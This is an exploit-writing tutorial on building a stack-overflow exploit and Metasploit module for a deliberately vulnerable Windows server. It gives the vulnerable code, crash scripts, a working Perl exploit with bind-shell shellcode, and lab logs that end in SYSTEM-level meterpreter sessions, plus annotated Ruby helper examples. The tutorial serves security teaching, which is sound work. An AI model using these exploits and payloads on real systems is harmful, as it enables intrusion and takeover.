
Exploit writing tutorial part 4 : From Exploit to Metasploit – The basics

2011-11-01 12:19
In the first parts of the exploit writing tutorial, I have discussed some common vulnerabilities that can lead to 2 types of exploits: stack based buffer overflows (with direct EIP overwrite), and stack based buffer overflows that take advantage of SEH chains. In my examples, I have used perl to demonstrate how to build a working exploit.

Obviously, writing exploits is not limited to perl only. I guess every programming language could be used to write exploits… so you can just pick the one that you are most familiar with. (python, c, c++, C#, etc)

Despite the fact that these custom written exploits will work just fine, it may be nice to be able to include your own exploits in the metasploit framework in order to take advantage of some of the unique metasploit features.

So today, I’m going to explain how exploits can be written as a metasploit module.

Metasploit modules are written in ruby. Even if you don’t know a lot about ruby, you should still be able to write a metasploit exploit module based on this tutorial and the existing exploits available in metasploit.

Metasploit exploit module structure

A typical metasploit exploit module consists of the following components:

- header and some dependencies
  - Some comments about the exploit module
  - require ‘msf/core’
- class definition
- includes
- “def” definitions:
  - initialize
  - check (optional)
  - exploit

You can put comments in your metasploit module by using the # character. That’s all we need to know for now, let’s look at the steps to build a metasploit exploit module.

Case study: building an exploit for a simple vulnerable server

We’ll use the following vulnerable server code (C) to demonstrate the building process:

#include <stdio.h>    // printf (the original listing included the non-standard <iostream.h>)
#include <string.h>   // strcpy
#include <winsock.h>
#include <windows.h>

// load windows socket
#pragma comment(lib, "wsock32.lib")

// Define Return Messages
#define SS_ERROR 1
#define SS_OK 0

// Copies whatever the client sent into a 500-byte stack buffer with no
// length check: this unbounded strcpy is the overflow the tutorial exploits.
void pr(char *str)
{
    char buf[500] = "";
    strcpy(buf, str);
}
void sError(char *str)
{
    MessageBox(NULL, str, "socket Error", MB_OK);
    WSACleanup();
}

int main(int argc, char **argv)
{

    WORD sockVersion;
    WSADATA wsaData;

    int rVal;
    char Message[5000] = "";
    char buf[2000] = "";

    u_short LocalPort;
    LocalPort = 200;

    // wsock32 initialized for usage
    sockVersion = MAKEWORD(1, 1);
    WSAStartup(sockVersion, &wsaData);

    // create server socket
    SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);

    if (serverSocket == INVALID_SOCKET)
    {
        sError("Failed socket()");
        return SS_ERROR;
    }

    SOCKADDR_IN sin;
    sin.sin_family = PF_INET;
    sin.sin_port = htons(LocalPort);
    sin.sin_addr.s_addr = INADDR_ANY;

    // bind the socket
    rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
    if (rVal == SOCKET_ERROR)
    {
        sError("Failed bind()");
        WSACleanup();
        return SS_ERROR;
    }

    // get socket to listen
    rVal = listen(serverSocket, 10);
    if (rVal == SOCKET_ERROR)
    {
        sError("Failed listen()");
        WSACleanup();
        return SS_ERROR;
    }

    // wait for a client to connect
    SOCKET clientSocket;
    clientSocket = accept(serverSocket, NULL, NULL);
    if (clientSocket == INVALID_SOCKET)
    {
        sError("Failed accept()");
        WSACleanup();
        return SS_ERROR;
    }

    int bytesRecv = SOCKET_ERROR;
    while (bytesRecv == SOCKET_ERROR)
    {
        // receive the data that is being sent by the client, max limit to 5000 bytes.
        bytesRecv = recv(clientSocket, Message, 5000, 0);

        if (bytesRecv == 0 || bytesRecv == WSAECONNRESET)
        {
            printf("\nConnection Closed.\n");
            break;
        }
    }

    // Pass the data received to the function pr
    pr(Message);

    // close client socket
    closesocket(clientSocket);
    // close server socket
    closesocket(serverSocket);

    WSACleanup();

    return SS_OK;
}


Compile the code and run it on a Windows 2003 server R2 with SP2. (I have used lcc-win32 to compile the code)

When you send 1000 bytes to the server, the server will crash.

The following perl script demonstrates the crash:

use strict;
use Socket;
my $junk = "\x41" x 1000;

# initialize host and port
my $host = shift || 'localhost';
my $port = shift || 200;

my $proto = getprotobyname('tcp');

# get the port address
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);

print "[+] Setting up socket\n";
# create the socket, connect to the port
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";

print "[+] Sending payload\n";
print SOCKET $junk."\n";

print "[+] Payload sent\n";

close SOCKET or die "close: $!";

The vulnerable server dies, and EIP gets overwritten with A’s:

0:001> g
(e00.de0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0012e05c ebx=7ffd6000 ecx=00000000 edx=0012e446 esi=0040bdec edi=0012ebe0
eip=41414141 esp=0012e258 ebp=41414141 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
41414141 ??              ???

Using a metasploit pattern, we determine that the offset to EIP overwrite is at 504 bytes. So we’ll build a new crash script to verify the offset and see the contents of the registers when the overflow occurs:

use strict;
use Socket;

my $totalbuffer = 1000;
my $junk = "\x41" x 504;
my $eipoverwrite = "\x42" x 4;
my $junk2 = "\x43" x ($totalbuffer - length($junk.$eipoverwrite));

# initialize host and port
my $host = shift || 'localhost';
my $port = shift || 200;

my $proto = getprotobyname('tcp');

# get the port address
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);

print "[+] Setting up socket\n";
# create the socket, connect to the port
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";

print "[+] Sending payload\n";
print SOCKET $junk.$eipoverwrite.$junk2."\n";

print "[+] Payload sent\n";

close SOCKET or die "close: $!";

After sending 504 A’s, 4 B’s and a bunch of C’s, we can see the following register and stack contents:

0:001> g
(ed0.eb0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0012e05c ebx=7ffde000 ecx=00000000 edx=0012e446 esi=0040bdec edi=0012ebe0
eip=42424242 esp=0012e258 ebp=41414141 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
42424242 ??              ???
0:000> d esp
0012e258  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012e268  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012e278  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012e288  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012e298  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012e2a8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012e2b8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012e2c8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
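The Metasploit cyclic pattern mentioned above is what pins the EIP offset at 504 bytes; the following Ruby is an added example (not part of the original tutorial) that re-implements pattern creation and offset lookup, and simulates the crash-time EIP value from the pattern itself instead of reading it from a debugger.

```ruby
# Added example, not part of the original tutorial: a minimal re-implementation
# of the cyclic-pattern technique (Metasploit's pattern_create / pattern_offset)
# that produced the 504-byte offset above.

UPPER = ('A'..'Z').to_a.freeze
LOWER = ('a'..'z').to_a.freeze
DIGIT = ('0'..'9').to_a.freeze

# Builds the "Aa0Aa1Aa2...Ab0Ab1..." pattern truncated to +length+ bytes.
# Every 4-byte window is unique within the first 20280 bytes, so any 4 bytes
# that end up in EIP identify exactly one position in the sent buffer.
def pattern_create(length)
  out = +''
  UPPER.each do |u|
    LOWER.each do |l|
      DIGIT.each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# +eip+ is the 32-bit value the debugger shows (e.g. 0x41414141). The CPU read
# it little-endian from the stack, so pack with 'V' before searching.
# Returns nil when EIP does not hold pattern bytes (i.e. no direct overwrite).
def pattern_offset(pattern, eip)
  pattern.index([eip].pack('V'))
end

# Simulated crash: instead of the debugger, take the 4 bytes a 1000-byte
# pattern places at position 504 and recover that position from them.
def demo_offset(buffer_len = 1000, crash_pos = 504)
  pat = pattern_create(buffer_len)
  simulated_eip = pat[crash_pos, 4].unpack1('V')
  pattern_offset(pat, simulated_eip)
end

puts "[+] offset to EIP: #{demo_offset}" if __FILE__ == $PROGRAM_NAME
```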

Increase the junk size to see how much space you have available for your shellcode. This is important because you will need to specify this parameter in the metasploit module.

Change the $totalbuffer value to 2000, overflow still works as expected, and the contents of esp indicate that we have been able to fill memory with C’s up to esp+5d3 (1491 bytes). That will be our shellcode space (more or less)

All we need is to overwrite EIP with jmp esp (or call esp, or something similar), and put our shellcode instead of the C’s and we should be fine.

Using findjmp, we have found a working address for our Windows 2003 R2 SP2 server:

findjmp.exe ws2_32.dll esp
Reg: esp
Scanning ws2_32.dll for code usable with the esp register
0x71C02B67      push esp - ret
Finished Scanning ws2_32.dll for code usable with the esp register
Found 1 usable addresses

After doing some tests with shellcode, we can use the following conclusions to build the final exploits:

- exclude 0xff from the shellcode
- put some nop’s before the shellcode

Our final exploit (in perl, with a shell bound to tcp 5555) looks like this:

#
print "--------------------------------------\n";
print "Writing Buffer Overflows\n";
print "Peter Van Eeckhoutte\n";
print "http://www.corelan.be:8800\n";
print "--------------------------------------\n";
print "Exploit for vulnserver.c\n";
print "--------------------------------------\n";
use strict;
use Socket;
my $junk = "\x90" x 504;

# jmp esp (from ws2_32.dll)
my $eipoverwrite = pack('V', 0x71C02B67);

# add some NOP's
my $shellcode = "\x90" x 50;

# windows/shell_bind_tcp - 702 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, LPORT=5555, RHOST=
$shellcode = $shellcode . "\x89\xe0\xd9\xd0\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x43".
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58".
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42".
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30".
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42\x4a".
"\x4a\x4b\x50\x4d\x4d\x38\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f".
"\x45\x30\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47\x35".
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f".
"\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x43\x31".
"\x4a\x4b\x47\x39\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e".
"\x50\x31\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x42\x54".
"\x45\x57\x49\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b".
"\x4c\x34\x47\x4b\x46\x34\x46\x44\x51\x38\x42\x55\x4a\x45".
"\x4c\x4b\x51\x4f\x51\x34\x43\x31\x4a\x4b\x43\x56\x4c\x4b".
"\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b".
"\x44\x43\x46\x4c\x4c\x4b\x4b\x39\x42\x4c\x51\x34\x45\x4c".
"\x45\x31\x49\x53\x46\x51\x49\x4b\x43\x54\x4c\x4b\x51\x53".
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c".
"\x4e\x4d\x4c\x4b\x51\x50\x44\x48\x51\x4e\x43\x58\x4c\x4e".
"\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x4e\x36\x45\x36".
"\x51\x43\x42\x46\x43\x58\x46\x53\x47\x42\x45\x38\x43\x47".
"\x44\x33\x46\x52\x51\x4f\x46\x34\x4b\x4f\x48\x50\x42\x48".
"\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48\x56".
"\x51\x4f\x4c\x49\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x45\x58".
"\x44\x42\x46\x35\x43\x5a\x43\x32\x4b\x4f\x4e\x30\x45\x38".
"\x48\x59\x45\x59\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56".
"\x51\x43\x50\x53\x50\x53\x46\x33\x46\x33\x51\x53\x50\x53".
"\x47\x33\x46\x33\x4b\x4f\x4e\x30\x42\x46\x42\x48\x42\x35".
"\x4e\x53\x45\x36\x50\x53\x4b\x39\x4b\x51\x4c\x55\x43\x58".
"\x4e\x44\x45\x4a\x44\x30\x49\x57\x46\x37\x4b\x4f\x4e\x36".
"\x42\x4a\x44\x50\x50\x51\x50\x55\x4b\x4f\x48\x50\x45\x38".
"\x49\x34\x4e\x4d\x46\x4e\x4a\x49\x50\x57\x4b\x4f\x49\x46".
"\x46\x33\x50\x55\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x51\x59".
"\x4c\x46\x51\x59\x51\x47\x4b\x4f\x49\x46\x46\x30\x50\x54".
"\x46\x34\x50\x55\x4b\x4f\x48\x50\x4a\x33\x43\x58\x4b\x57".
"\x43\x49\x48\x46\x44\x39\x51\x47\x4b\x4f\x4e\x36\x46\x35".
"\x4b\x4f\x48\x50\x43\x56\x43\x5a\x45\x34\x42\x46\x45\x38".
"\x43\x53\x42\x4d\x4b\x39\x4a\x45\x42\x4a\x50\x50\x50\x59".
"\x47\x59\x48\x4c\x4b\x39\x4d\x37\x42\x4a\x47\x34\x4c\x49".
"\x4b\x52\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32".
"\x46\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a".
"\x46\x58\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x43\x42\x4b\x4e".
"\x48\x33\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56".
"\x51\x4b\x46\x37\x50\x52\x50\x51\x50\x51\x50\x51\x43\x5a".
"\x45\x51\x46\x31\x50\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30".
"\x43\x58\x4e\x4d\x49\x49\x44\x45\x48\x4e\x46\x33\x4b\x4f".
"\x48\x56\x43\x5a\x4b\x4f\x4b\x4f\x50\x37\x4b\x4f\x4e\x30".
"\x4c\x4b\x51\x47\x4b\x4c\x4b\x33\x49\x54\x42\x44\x4b\x4f".
"\x48\x56\x51\x42\x4b\x4f\x48\x50\x43\x58\x4a\x50\x4c\x4a".
"\x43\x34\x51\x4f\x50\x53\x4b\x4f\x4e\x36\x4b\x4f\x48\x50".
"\x41\x41";

# initialize host and port
my $host = shift || 'localhost';
my $port = shift || 200;

my $proto = getprotobyname('tcp');

# get the port address
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);

print "[+] Setting up socket\n";
# create the socket, connect to the port
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";

print "[+] Sending payload\n";
print SOCKET $junk.$eipoverwrite.$shellcode."\n";

print "[+] Payload sent\n";
print "[+] Attempting to telnet to $host on port 5555...\n";
system("telnet $host 5555");

close SOCKET or die "close: $!";

Exploit output:

root@backtrack4:/tmp# perl sploit.pl 192.168.24.3 200
--------------------------------------
Writing Buffer Overflows
Peter Van Eeckhoutte
http://www.corelan.be:8800
--------------------------------------
Exploit for vulnserver.c
--------------------------------------
[+] Setting up socket
[+] Connecting to 192.168.24.3 on port 200
[+] Sending payload
[+] Payload sent
[+] Attempting to telnet to 192.168.24.3 on port 5555...
Trying 192.168.24.3...
Connected to 192.168.24.3.
Escape character is '^]'.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\vulnserver\lcc>whoami
whoami
win2003-01\administrator

The most important parameters that can be taken from this exploit are:

- offset to ret (eip overwrite) is 504
- windows 2003 R2 SP2 (English) jump address is 0x71C02B67
- shellcode should not contain 0x00 or 0xff
- shellcode can be more or less 1400 bytes

Furthermore, after running the same tests against a Windows XP SP3 (English), we determine that the offset is the same, but the jmp address must be changed (to for example 0x7C874413). We’ll build a metasploit module that will allow you to select one of these 2 targets, and will use the correct jmp address.

Converting the exploit to metasploit

First, you need to determine what type your exploit will be, because that will determine the place within the metasploit folder structure where the exploit will be saved. If your exploit is targeting a windows based ftp server, it would need to be placed under the windows ftp server exploits.

Metasploit modules are saved in the framework3xx folder structure, under /modules/exploits. In that folder, the exploits are broken down into operating systems first, and then services.

Our server runs on windows, so we’ll put it under windows. The windows folder contains a number of folders already (from antivirus to wins), including a “misc” folder. We’ll put our exploit under “misc” (or we could put it under telnet) because it does not really belong to any of the other types.

We’ll create our metasploit module under %metasploit%/modules/windows/misc:

root@backtrack4:/# cd /pentest/exploits/framework3/modules/exploits/windows/misc
root@backtrack4:/pentest/exploits/framework3/modules/exploits/windows/misc# vi custom_vulnserver.rb


#
#
# Custom metasploit exploit for vulnserver.c
# Written by Peter Van Eeckhoutte
#
#
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Custom vulnerable server stack overflow',
      'Description'    => %q{
        This module exploits a stack overflow in a
        custom vulnerable server.
      },
      'Author'         => [ 'Peter Van Eeckhoutte' ],
      'Version'        => '$Revision: 9999 $',
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 1400,
          'BadChars' => "\x00\xff",
        },
      'Platform'       => 'win',

      'Targets'        =>
        [
          [ 'Windows XP SP3 En',
            { 'Ret' => 0x7c874413, 'Offset' => 504 } ],
          [ 'Windows 2003 Server R2 SP2',
            { 'Ret' => 0x71c02b67, 'Offset' => 504 } ],
        ],
      'DefaultTarget'  => 0,

      'Privileged'     => false
    ))

    register_options(
      [
        Opt::RPORT(200)
      ], self.class)
  end

  def exploit
    connect

    # junk up to the saved return address, the per-target jump address
    # (little-endian), a NOP sled and then the encoded payload
    junk   = make_nops(target['Offset'])
    sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
    sock.put(sploit)

    handler
    disconnect

  end

end

We see the following components:

- first, put “require msf/core”, which will be valid for all metasploit exploits
- define the class. In our case, it is a remote exploit.
- Next, set exploit information and exploit definitions:
  - include: in our case, it is a plain tcp connection, so we use Msf::Exploit::Remote::Tcp
    Metasploit has handlers for http, ftp, etc… (which will help you building exploits faster because you don’t have to write the entire conversation yourself)
  - Information:
    - Payload: define the length and badchars (0x00 and 0xff in our case)
    - Define the targets, and define target-specific settings such as return address, offset, etc
  - Exploit:
    - connect (which will set up the connection to the remote port)
    - build the buffer:
      - junk (nops, with size of offset)
      - add the return address, more nops, and then the encoded payload
    - write the buffer to the connection
    - handle the exploit
    - disconnect

That’s it
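The buffer the exploit method assembles, and what the 'Space' and 'BadChars' entries of the Payload hash promise to the framework, spelled out as an added Ruby example (not code from the tutorial or from the Metasploit framework); it reuses the target values from the module above and assumes make_nops is a plain 0x90 sled.

```ruby
# Added example, not part of the tutorial or of the Metasploit framework:
# the buffer layout the module's exploit method builds, plus explicit checks
# for what the 'Space' and 'BadChars' declarations promise to the framework.

# Target table copied from the module above ('Ret' = jmp/push esp address,
# 'Offset' = bytes of junk before the saved return address).
TARGETS = {
  'Windows XP SP3 En'          => { 'Ret' => 0x7c874413, 'Offset' => 504 },
  'Windows 2003 Server R2 SP2' => { 'Ret' => 0x71c02b67, 'Offset' => 504 },
}.freeze

# The module's 'Payload' hash: the encoder must fit in Space and avoid BadChars.
PAYLOAD_INFO = { 'Space' => 1400, 'BadChars' => "\x00\xff".b }.freeze

# Raises unless +payload+ (a binary string) satisfies the Payload declaration.
def check_payload(payload, info = PAYLOAD_INFO)
  if payload.bytesize > info['Space']
    raise "payload too large: #{payload.bytesize} > #{info['Space']} bytes"
  end
  bad = payload.bytes & info['BadChars'].bytes
  unless bad.empty?
    raise "payload contains bad chars: #{bad.map { |b| format('0x%02x', b) }.join(' ')}"
  end
  true
end

# Mirrors `junk + [target.ret].pack('V') + make_nops(50) + payload.encoded`.
# Assumption: make_nops is modelled as a plain 0x90 sled (the framework may
# choose other single-byte instructions).
def build_buffer(target, payload, nop_count = 50)
  check_payload(payload)
  junk = "\x90".b * target['Offset']
  junk + [target['Ret']].pack('V') + ("\x90".b * nop_count) + payload
end

# The 4 bytes that land in EIP, decoded little-endian ('V') as the CPU does.
def eip_slot(buffer, target)
  buffer[target['Offset'], 4].unpack1('V')
end

# Offset at which the encoded payload starts within the buffer.
def payload_offset(target, nop_count = 50)
  target['Offset'] + 4 + nop_count
end

if __FILE__ == $PROGRAM_NAME
  # constructed stand-in for payload.encoded: 32 harmless 0x41 bytes
  sample = "\x41".b * 32
  target = TARGETS['Windows 2003 Server R2 SP2']
  buf    = build_buffer(target, sample)
  puts format('[+] %d-byte buffer, EIP slot = 0x%08x', buf.bytesize, eip_slot(buf, target))
  begin
    check_payload("\x41\x00".b)
  rescue RuntimeError => e
    puts "[-] #{e.message}"
  end
end
```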

Now open msfconsole. If there is an error in your script, you will see information about the error while msfconsole loads. If msfconsole was already loaded, you’ll have to close it again before you can use this new module (or before you can use the updated module if you have made a change).

Test the exploit

Test 1: Windows XP SP3

root@backtrack4:/pentest/exploits/framework3# ./msfconsole


       =[ msf v3.3-dev
+ -- --=[ 395 exploits - 239 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 187 aux

msf > use windows/misc/custom_vulnserver
msf exploit(custom_vulnserver) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  200              yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 En

msf exploit(custom_vulnserver) > set rhost 192.168.24.10
rhost => 192.168.24.10
msf exploit(custom_vulnserver) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows XP SP3 En
   1   Windows 2003 Server R2 SP2

msf exploit(custom_vulnserver) > set target 0
target => 0
msf exploit(custom_vulnserver) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(custom_vulnserver) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.24.10    yes       The target address
   RPORT  200              yes       The target port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     192.168.24.10    no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 En

msf exploit(custom_vulnserver) > exploit

[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.24.1:42150 -> 192.168.24.10:4444)

meterpreter > sysinfo
Computer: SPLOITBUILDER1
OS      : Windows XP (Build 2600, Service Pack 3).


Test 2: Windows 2003 Server R2 SP2

(continued from exploit to XP):

meterpreter >
meterpreter > quit

[*] Meterpreter session 1 closed.
msf exploit(custom_vulnserver) > set rhost 192.168.24.3
rhost => 192.168.24.3
msf exploit(custom_vulnserver) > set target 1
target => 1
msf exploit(custom_vulnserver) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.24.3     yes       The target address
   RPORT  200              yes       The target port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     192.168.24.3     no        The target address

Exploit target:

   Id  Name
   --  ----
   1   Windows 2003 Server R2 SP2

msf exploit(custom_vulnserver) > exploit

[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 2 opened (192.168.24.1:56109 -> 192.168.24.3:4444)

meterpreter > sysinfo
Computer: WIN2003-01
OS      : Windows .NET Server (Build 3790, Service Pack 2).

meterpreter > getuid
Server username: WIN2003-01\Administrator
meterpreter > ps

Process list
============

 PID   Name            Path
 ---   ----            ----
 300   smss.exe        \SystemRoot\System32\smss.exe
 372   winlogon.exe    \??\C:\WINDOWS\system32\winlogon.exe
 396   Explorer.EXE    C:\WINDOWS\Explorer.EXE
 420   services.exe    C:\WINDOWS\system32\services.exe
 424   ctfmon.exe      C:\WINDOWS\system32\ctfmon.exe
 432   lsass.exe       C:\WINDOWS\system32\lsass.exe
 652   svchost.exe     C:\WINDOWS\system32\svchost.exe
 832   svchost.exe     C:\WINDOWS\System32\svchost.exe
 996   spoolsv.exe     C:\WINDOWS\system32\spoolsv.exe
 1132  svchost.exe     C:\WINDOWS\System32\svchost.exe
 1392  dllhost.exe     C:\WINDOWS\system32\dllhost.exe
 1580  svchost.exe     C:\WINDOWS\System32\svchost.exe
 1600  svchost.exe     C:\WINDOWS\System32\svchost.exe
 2352  cmd.exe         C:\WINDOWS\system32\cmd.exe
 2888  vulnserver.exe  C:\vulnserver\lcc\vulnserver.exe

meterpreter > migrate 996
[*] Migrating to 996...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

pwned!

More info about the Metasploit API

You can find more information about the Metasploit API (and available classes) at
http://www.metasploit.com/documents/api/msfcore/index.html
Now go out and build your own exploits, put some l33t talk in the exploit and don’t forget to send your greetings to corelanc0d3r :-)

© 2009 – 2010, Corelan Team (corelanc0d3r). All rights reserved.